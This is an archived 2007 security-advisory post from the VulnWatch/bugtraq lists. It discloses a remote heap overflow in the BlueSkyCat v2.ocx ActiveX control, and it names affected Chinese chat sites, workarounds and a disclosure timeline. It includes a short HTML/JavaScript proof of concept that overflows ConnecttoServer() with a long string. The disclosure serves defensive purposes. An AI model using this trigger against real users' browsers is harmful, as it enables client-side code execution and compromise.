bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulne

from [Code Audit Labs] [Permanent Link][Original]
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
Subject: [VulnWatch] CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability
From: Code Audit Labs <vulnhunt@gmail.com>
Date: Tue, 31 Jul 2007 09:10:43 +0800
Delivered-to: sp-com-lists@consult.net
Delivered-to: vulnwatch-list@securepoint.com
Delivered-to: mailing list vulnwatch@vulnwatch.org
Delivered-to: moderator for vulnwatch@vulnwatch.org
Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding; b=UsXNQwjLgHyGDX6sNPXANpf8rxd7uNx3hEdc9nYbU7KRLE+hkly4iI5GXXteMZSjouJcnFIX8KedES7CUWUBAykiizmRd3sezaCdy2PeprIMxWc5D/EPCcOUqAUe0yEj3aJMkcmylL16UwBwwS+RpGmCRExwv2vOSydONYz7JdA=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding; b=jD6QLjoO98p63ErgBlQ9dcTc0b06jigCHZ6PRRt9/G0nOkYH9ath9h5ccW0mFuzn3Q6UpljXwHt3FOmumk7WYcIXHH3uC7foQvrG+bwiDBe6PouDoMPA0LXoXZBEDjG0EGlYhL8OzGUxTt0Y/YFZEZJ/hi/UqZ1fdPbMCsix8zE=
List-help: <mailto:vulnwatch-help@vulnwatch.org>
List-post: <mailto:vulnwatch@vulnwatch.org>
List-subscribe: <mailto:vulnwatch-subscribe@vulnwatch.org>
List-unsubscribe: <mailto:vulnwatch-unsubscribe@vulnwatch.org>
Mailing-list: contact vulnwatch-help@vulnwatch.org; run by ezmlm
User-agent: Thunderbird 2.0.0.5 (Windows/20070716) 
  CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability

BACKGROUND:
===========

  BlueSkychat is a professional voice and video chat software widely used
by large chat websites in china.


DESCRIPTION:
============

  Code Audit Labs Code Audit for BlueSkyCat ActiveX Control and discovered
a vulnerability .

  Remote exploitation of a buffer overflow in an ActiveX control
distributed
with Bluesky.cn could allow for the execution of arbitrary code.

  When Blueskychat are installed, they register the following ActiveX
control on the system:

  ProgId: V2.V2Ctrl.1
  ClassId: 2EA6D939-4445-43F1-A12B-8CB3DDA8B855
  File: v2.ocx

  This control contains a buffer overflow in its ConnecttoServer() method.

  This is a clent side vulnerability. So the clients of following chat
servers which install the affected BlueSkyCat software are affected.
bliao         http://www.bliao.com
qqliao        http://www.qqliao.com
7liao         http://www.7liao.com
haoliao       http://www.haoliao.net
51liao        http://chat.51liao.net
heshang       http://www.heshang.net
xicn          http://vchat.xicn.net
CN104         http://www.cn104.com
liao-tian     http://www.liao-tian.com
aliao         http://www.aliao.net
kuailiao      http://www.kuailiao.com
mtliao        http://www.mtliao.com
pj0427        http://www.pj0427.com
uighur        http://chat.uighur.cn
wmliao        http://www.wmliao.com


CVE:
====
We request a CVE number to assign to this vulnerability.


Affected version:
================
v2.ocx  version 8.1.2.0 and prior


vendor:
=======
BlueSky http://www.bluesky.cn/


POC:
========
<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">

function ClickForRunCalc()
{
    var heapSprayToAddress = 0x0d0d0d0d;

    var payLoadCode = "A" ;
    while (payLoadCode.length <= 10000) payLoadCode+='A';
    com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>


Code Audit Labs Suggestion
==========================
for vendor:
  Do a full coverage Code Audit or Code Review

for client:
The following workarounds are available for this vulnerability:
    * Disable Active Scripting
    * Unregister the vulnerable control
    * Set the killbit for the vulnerable control
    * or update the software from http://www.bluesky.cn


DISCLOSURE TIMELINE:
====================
1: 2007-07-29 notice vendor (mail to blueskychat@gmail.com)
2: 2007-07-29 the vendor reply "thank,had fixed it".
3: 2007-07-30 we check it out, in fact,the websites which install the
  software did not almost all be updated,send mail to vendor again.
4: 2007-07-31 release this report


About Us:
=========
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com


Original LINK:
==============

1:
http://www.vulnhunt.com/advisories/CAL-20070730-1_BlueSkyCat_v2.ocx_ActiveX_remote_heap_overflow_vulnerability_en.txt
2: http://CodeAudit.blogspot.com

EOF


--
Code Audit Labs
http://www.vulnhunt.com/
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability, Code Audit Labs <=
Previous by Date:  [VulnWatch] iDefense Security Advisory 07.26.07: IBM AIX ftp gets() Multiple Buffer Overflow Vulnerabilities, iDefense Labs
Previous by Thread:  [VulnWatch] iDefense Security Advisory 07.26.07: IBM AIX ftp gets() Multiple Buffer Overflow Vulnerabilities, iDefense Labs
Indexes:  [Date] [Thread] [Top] [All Lists]